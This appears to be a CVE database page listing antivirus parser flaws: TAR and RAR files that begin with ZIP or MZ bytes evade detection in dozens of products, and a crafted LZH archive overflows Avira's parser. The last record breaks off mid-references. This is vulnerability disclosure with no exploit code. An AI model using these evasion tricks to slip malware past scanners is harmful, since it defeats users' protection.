The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence (the hex bytes 50 4B 03 04, i.e. "PK\x03\x04", the ZIP local file header signature). NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
http://www.securityfocus.com/archive/1/522005 (mailing-list, x_refsource_BUGTRAQ)
http://osvdb.org/80403 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80389 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80391 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80409 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80396 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80392 (vdb-entry, x_refsource_OSVDB)
http://www.ieee-security.org/TC/SP2012/program.html (x_refsource_MISC)
http://osvdb.org/80395 (vdb-entry, x_refsource_OSVDB)
Impacted products
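Vendor: n/a | Product: n/a | Version: n/a
Note: the structured vendor, product and version fields of this record are all "n/a"; the affected products and versions are named only in the Summary text, so a lookup that matches on those fields alone will not find them.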


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T18:53:37.370Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "80403",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80403",
               },
               {
                  name: "80389",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80389",
               },
               {
                  name: "80391",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80391",
               },
               {
                  name: "80409",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80409",
               },
               {
                  name: "80396",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80396",
               },
               {
                  name: "80392",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80392",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "80395",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80395",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2012-08-13T09:00:00",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "80403",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80403",
            },
            {
               name: "80389",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80389",
            },
            {
               name: "80391",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80391",
            },
            {
               name: "80409",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80409",
            },
            {
               name: "80396",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80396",
            },
            {
               name: "80392",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80392",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "80395",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80395",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1425",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "80403",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80403",
                  },
                  {
                     name: "80389",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80389",
                  },
                  {
                     name: "80391",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80391",
                  },
                  {
                     name: "80409",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80409",
                  },
                  {
                     name: "80396",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80396",
                  },
                  {
                     name: "80392",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80392",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "80395",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80395",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1425",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T18:53:37.370Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2012-1443
Vulnerability from cvelistv5
Published
2012-03-21 10:00
Modified
2024-08-06 19:01
Severity ?
Summary
The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.
References
http://osvdb.org/80472 (vdb-entry, x_refsource_OSVDB)
http://www.securityfocus.com/archive/1/522005 (mailing-list, x_refsource_BUGTRAQ)
http://www.securityfocus.com/bid/52612 (vdb-entry, x_refsource_BID)
http://osvdb.org/80467 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80461 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80470 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80460 (vdb-entry, x_refsource_OSVDB)
http://www.ieee-security.org/TC/SP2012/program.html (x_refsource_MISC)
http://osvdb.org/80468 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80456 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80457 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80458 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80454 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80455 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80459 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80469 (vdb-entry, x_refsource_OSVDB)
http://osvdb.org/80471 (vdb-entry, x_refsource_OSVDB)
Impacted products
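Vendor: n/a | Product: n/a | Version: n/a
Note: the structured vendor, product and version fields of this record are all "n/a"; the affected products and versions are named only in the Summary text, so a lookup that matches on those fields alone will not find them.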


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-06T19:01:00.328Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "80472",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80472",
               },
               {
                  name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/522005",
               },
               {
                  name: "52612",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/52612",
               },
               {
                  name: "80467",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80467",
               },
               {
                  name: "80461",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80461",
               },
               {
                  name: "80470",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80470",
               },
               {
                  name: "80460",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80460",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.ieee-security.org/TC/SP2012/program.html",
               },
               {
                  name: "80468",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80468",
               },
               {
                  name: "80456",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80456",
               },
               {
                  name: "80457",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80457",
               },
               {
                  name: "80458",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80458",
               },
               {
                  name: "80454",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80454",
               },
               {
                  name: "80455",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80455",
               },
               {
                  name: "80459",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80459",
               },
               {
                  name: "80469",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80469",
               },
               {
                  name: "80471",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/80471",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2012-03-19T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2012-07-28T09:00:00",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               name: "80472",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80472",
            },
            {
               name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
               tags: [
                  "mailing-list",
                  "x_refsource_BUGTRAQ",
               ],
               url: "http://www.securityfocus.com/archive/1/522005",
            },
            {
               name: "52612",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/52612",
            },
            {
               name: "80467",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80467",
            },
            {
               name: "80461",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80461",
            },
            {
               name: "80470",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80470",
            },
            {
               name: "80460",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80460",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.ieee-security.org/TC/SP2012/program.html",
            },
            {
               name: "80468",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80468",
            },
            {
               name: "80456",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80456",
            },
            {
               name: "80457",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80457",
            },
            {
               name: "80458",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80458",
            },
            {
               name: "80454",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80454",
            },
            {
               name: "80455",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80455",
            },
            {
               name: "80459",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80459",
            },
            {
               name: "80469",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80469",
            },
            {
               name: "80471",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/80471",
            },
         ],
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "cve@mitre.org",
               ID: "CVE-2012-1443",
               STATE: "PUBLIC",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "n/a",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "n/a",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.",
                  },
               ],
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "n/a",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "80472",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80472",
                  },
                  {
                     name: "20120319 Evasion attacks expoliting file-parsing vulnerabilities in antivirus products",
                     refsource: "BUGTRAQ",
                     url: "http://www.securityfocus.com/archive/1/522005",
                  },
                  {
                     name: "52612",
                     refsource: "BID",
                     url: "http://www.securityfocus.com/bid/52612",
                  },
                  {
                     name: "80467",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80467",
                  },
                  {
                     name: "80461",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80461",
                  },
                  {
                     name: "80470",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80470",
                  },
                  {
                     name: "80460",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80460",
                  },
                  {
                     name: "http://www.ieee-security.org/TC/SP2012/program.html",
                     refsource: "MISC",
                     url: "http://www.ieee-security.org/TC/SP2012/program.html",
                  },
                  {
                     name: "80468",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80468",
                  },
                  {
                     name: "80456",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80456",
                  },
                  {
                     name: "80457",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80457",
                  },
                  {
                     name: "80458",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80458",
                  },
                  {
                     name: "80454",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80454",
                  },
                  {
                     name: "80455",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80455",
                  },
                  {
                     name: "80459",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80459",
                  },
                  {
                     name: "80469",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80469",
                  },
                  {
                     name: "80471",
                     refsource: "OSVDB",
                     url: "http://osvdb.org/80471",
                  },
               ],
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
      assignerShortName: "mitre",
      cveId: "CVE-2012-1443",
      datePublished: "2012-03-21T10:00:00",
      dateReserved: "2012-02-29T00:00:00",
      dateUpdated: "2024-08-06T19:01:00.328Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2007-2974
Vulnerability from cvelistv5
Published
2007-06-01 01:00
Modified
2024-08-07 13:57
Severity ?
Summary
Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an "integer cast around."
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-07T13:57:54.858Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
               },
               {
                  name: "24187",
                  tags: [
                     "vdb-entry",
                     "x_refsource_BID",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/bid/24187",
               },
               {
                  tags: [
                     "x_refsource_CONFIRM",
                     "x_transferred",
                  ],
                  url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
               },
               {
                  name: "ADV-2007-1971",
                  tags: [
                     "vdb-entry",
                     "x_refsource_VUPEN",
                     "x_transferred",
                  ],
                  url: "http://www.vupen.com/english/advisories/2007/1971",
               },
               {
                  name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                  tags: [
                     "mailing-list",
                     "x_refsource_FULLDISC",
                     "x_transferred",
                  ],
                  url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
               },
               {
                  name: "36712",
                  tags: [
                     "vdb-entry",
                     "x_refsource_OSVDB",
                     "x_transferred",
                  ],
                  url: "http://osvdb.org/36712",
               },
               {
                  name: "2764",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SREASON",
                     "x_transferred",
                  ],
                  url: "http://securityreason.com/securityalert/2764",
               },
               {
                  name: "25417",
                  tags: [
                     "third-party-advisory",
                     "x_refsource_SECUNIA",
                     "x_transferred",
                  ],
                  url: "http://secunia.com/advisories/25417",
               },
               {
                  name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
                  tags: [
                     "mailing-list",
                     "x_refsource_BUGTRAQ",
                     "x_transferred",
                  ],
                  url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
               },
               {
                  name: "avira-antivir-lzh-bo(34551)",
                  tags: [
                     "vdb-entry",
                     "x_refsource_XF",
                     "x_transferred",
                  ],
                  url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
               },
               {
                  name: "1018131",
                  tags: [
                     "vdb-entry",
                     "x_refsource_SECTRACK",
                     "x_transferred",
                  ],
                  url: "http://securitytracker.com/id?1018131",
               },
            ],
            title: "CVE Program Container",
         },
      ],
      cna: {
         affected: [
            {
               product: "n/a",
               vendor: "n/a",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2007-05-23T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Buffer overflow in the file parsing engine in Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to execute arbitrary code via a crafted LZH archive file, resulting from an \"integer cast around.\"",
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     description: "n/a",
                     lang: "en",
                     type: "text",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2018-10-16T14:57:01",
            orgId: "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
            shortName: "mitre",
         },
         references: [
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
            },
            {
               name: "24187",
               tags: [
                  "vdb-entry",
                  "x_refsource_BID",
               ],
               url: "http://www.securityfocus.com/bid/24187",
            },
            {
               tags: [
                  "x_refsource_CONFIRM",
               ],
               url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
            },
            {
               name: "ADV-2007-1971",
               tags: [
                  "vdb-entry",
                  "x_refsource_VUPEN",
               ],
               url: "http://www.vupen.com/english/advisories/2007/1971",
            },
            {
               name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
               tags: [
                  "mailing-list",
                  "x_refsource_FULLDISC",
               ],
               url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
            },
            {
               name: "36712",
               tags: [
                  "vdb-entry",
                  "x_refsource_OSVDB",
               ],
               url: "http://osvdb.org/36712",
            },
            {
               name: "2764",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SREASON",
               ],
               url: "http://securityreason.com/securityalert/2764",
            },
            {
               name: "25417",
               tags: [
                  "third-party-advisory",
                  "x_refsource_SECUNIA",
               ],
               url: "http://secunia.com/advisories/25417",
            },
            {
               name: "20070528 n.runs-SA-2007.010 - Avira Antivir Antivirus LZH parsing Arbitrary Code Execution Advisory",
